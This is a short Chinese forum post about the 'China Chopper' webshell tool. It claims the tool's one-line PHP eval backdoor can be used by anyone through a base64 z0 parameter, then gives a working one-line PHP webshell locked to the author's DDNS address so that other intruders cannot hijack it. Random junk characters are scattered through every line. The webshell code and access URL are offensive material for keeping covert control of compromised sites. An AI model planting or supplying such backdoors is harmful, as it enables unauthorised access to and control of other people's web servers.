今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞( c* k. G0 L" U
, r2 m h% f6 W: R N
就算你设置了密码,使用了eval($_REQUEST['moyo']);' D% A7 ]& y* ^* e
3 j) v7 T$ A. R+ K但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门$ w- S0 c3 z1 S- O" z8 f9 X
# S8 ~) k0 l9 U8 ]4 Z# X因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
, m, ?0 |! ]' U
" E& _1 D, K* @; M直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
5 A) K/ \9 @. y( q; l# u4 P, t+ N7 r, ~$ e/ y% A% L9 Q$ r% g
不知道是设计缺陷还是故意留的后门9 d3 j; f1 @) l& b. j: [ p
8 l- L! s4 l$ J如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
. e+ u! l9 V) r, H% @8 @! n% ?, O1 w7 ?, y7 g6 }
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org2 w. {5 U8 Y4 k% k6 L$ p }- w
8 a# U- p5 G& P( |0 h1 _
然后一句话后门这样写
" a# ?* _/ }/ S1 ?% `8 @7 B# s& i. `7 T$ n
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
7 ~# S8 E3 l. A# t. Y这样就可以让一句话后门只允许自己的电脑连接了; X' z& B8 r# @. M0 ]+ ?
" R; u% R4 j3 g4 F% w% H |